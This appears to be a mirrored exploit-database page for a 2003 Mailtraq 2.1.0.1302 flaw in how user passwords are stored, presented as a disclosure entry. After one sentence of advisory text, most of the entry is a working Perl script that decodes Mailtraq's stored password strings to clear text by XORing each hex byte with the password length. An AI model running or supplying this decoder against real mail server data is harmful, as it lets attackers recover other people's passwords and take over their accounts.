[] NeoSense
E X P L O I T S
title author type platform port cve id

Mailtraq 2.1.0.1302 - User Password Encoding

Author: Noam Rathaus
type: local
platform: windows
port: 
date_added: 2003-06-16 
date_updated: 2012-11-17 
verified: 1 
codes: OSVDB-4092 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/7923/info

It has been reported that Mailtraq does not securely store passwords. Because of this, an attacker may have an increased chance at gaining access to clear text passwords.

#!/usr/bin/perl

$Password = $ARGV[0];

print "Passwords should be something like: \\3D66656463626160\n";
print "Provided password: $Password\n";

$Password = substr($Password, 3);
$Length = length($Password)/2;

print "Length: $Length\n";

for ($i = 0; $i < $Length; $i++)
{
 print "Decoding: ", substr($Password, $i*2, 2), " = ";
 $ord = hex(substr($Password, $i*2, 2));

 print $ord^$Length, " (", chr($ord^$Length), ")\n";
}
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.